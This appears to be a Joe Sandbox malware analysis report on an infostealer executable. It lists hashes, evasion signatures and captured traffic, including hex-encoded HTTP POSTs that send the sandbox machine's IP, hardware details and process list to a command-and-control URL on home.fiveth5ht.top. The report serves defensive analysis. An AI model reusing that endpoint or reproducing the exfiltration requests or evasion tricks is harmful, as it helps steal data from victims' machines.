Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
s8kPMNXOZY.exe

Overview

General Information

Sample name:s8kPMNXOZY.exe
renamed because original name is a hash value
Original sample name:fbba61c61fa706eec44a022a1e9e3bac.exe
Analysis ID:1581592
MD5:fbba61c61fa706eec44a022a1e9e3bac
SHA1:74e5e5e2ad5dfba941f35c8e207cad219b9ad21d
SHA256:085ebe5916195a08c768e279650cdaa09b11b8ceda0fad4b9a499a4a3267b461
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • s8kPMNXOZY.exe (PID: 8156 cmdline: "C:\Users\user\Desktop\s8kPMNXOZY.exe" MD5: FBBA61C61FA706EEC44A022A1E9E3BAC)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: s8kPMNXOZY.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: s8kPMNXOZY.exeVirustotal: Detection: 52%Perma Link
Source: s8kPMNXOZY.exeReversingLabs: Detection: 63%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: s8kPMNXOZY.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: -----BEGIN PUBLIC KEY-----0_2_0026DCF0
Source: s8kPMNXOZY.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_002AA5B0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_002AA7F0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_002AA7F0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_002AA7F0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_002AA7F0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_002AA7F0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_002AA7F0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_002AB560
Source: s8kPMNXOZY.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_0024255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0024255D
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_002429FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_002429FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 461736Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 31 37 33 39 36 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_0030A8C0 recvfrom,0_2_0030A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 461736Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 31 37 33 39 36 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: s8kPMNXOZY.exe, 00000000.00000003.1398993637.0000000000F73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQ
Source: s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: s8kPMNXOZY.exe, 00000000.00000003.1398924001.0000000000F04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: s8kPMNXOZY.exe, 00000000.00000003.1398627069.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, s8kPMNXOZY.exe, 00000000.00000002.1406172841.0000000000F04000.00000004.00000020.00020000.00000000.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1398924001.0000000000F04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: s8kPMNXOZY.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: s8kPMNXOZY.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: s8kPMNXOZY.exe, s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704

System Summary

barindex
PE file contains section with special chars
Source: s8kPMNXOZY.exeStatic PE information: section name:
Source: s8kPMNXOZY.exeStatic PE information: section name: .idata
Source: s8kPMNXOZY.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_002505B00_2_002505B0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_00256FA00_2_00256FA0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_0027F1000_2_0027F100
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_0030B1800_2_0030B180
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_005CE0500_2_005CE050
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_005CA0000_2_005CA000
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_003100E00_2_003100E0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_002A62100_2_002A6210
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_0030C3200_2_0030C320
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_003104200_2_00310420
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_005944100_2_00594410
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_0024E6200_2_0024E620
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_0030C7700_2_0030C770
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_005A67300_2_005A6730
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_002AA7F00_2_002AA7F0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_005C47800_2_005C4780
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_002FC9000_2_002FC900
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_0024A9600_2_0024A960
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_002549400_2_00254940
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_00416AC00_2_00416AC0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_004FAAC00_2_004FAAC0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_003D4B600_2_003D4B60
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_004FAB2C0_2_004FAB2C
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_0024CBB00_2_0024CBB0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_005B8BF00_2_005B8BF0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_005CCC900_2_005CCC90
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_005C4D400_2_005C4D40
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_00400D800_2_00400D80
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_005BCD800_2_005BCD80
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_0055AE300_2_0055AE30
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_00264F700_2_00264F70
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_0030EF900_2_0030EF90
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_00308F900_2_00308F90
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_00592F900_2_00592F90
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_002510E60_2_002510E6
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_005AD4300_2_005AD430
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_005B35B00_2_005B35B0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_005D17A00_2_005D17A0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_002F98800_2_002F9880
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_005999200_2_00599920
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_005C3A700_2_005C3A70
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_005B1BD00_2_005B1BD0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_00281BE00_2_00281BE0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_005A7CC00_2_005A7CC0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_004F9C800_2_004F9C80
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_00255DB00_2_00255DB0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: String function: 002475A0 appears 659 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: String function: 00285340 appears 45 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: String function: 003F7220 appears 101 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: String function: 0041CBC0 appears 101 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: String function: 00284FD0 appears 260 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: String function: 003244A0 appears 72 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: String function: 00284F40 appears 325 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: String function: 0025CCD0 appears 55 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: String function: 0024C960 appears 36 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: String function: 002473F0 appears 113 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: String function: 002471E0 appears 47 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: String function: 0024CAA0 appears 63 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: String function: 0025CD40 appears 78 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: String function: 002850A0 appears 99 times
Source: s8kPMNXOZY.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: s8kPMNXOZY.exeStatic PE information: Section: njaplbck ZLIB complexity 0.9943981619190929
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_0024255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0024255D
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_002429FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_002429FF
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: s8kPMNXOZY.exeVirustotal: Detection: 52%
Source: s8kPMNXOZY.exeReversingLabs: Detection: 63%
Source: s8kPMNXOZY.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: s8kPMNXOZY.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSection loaded: kernel.appcore.dllJump to behavior
Source: s8kPMNXOZY.exeStatic file information: File size 4500992 > 1048576
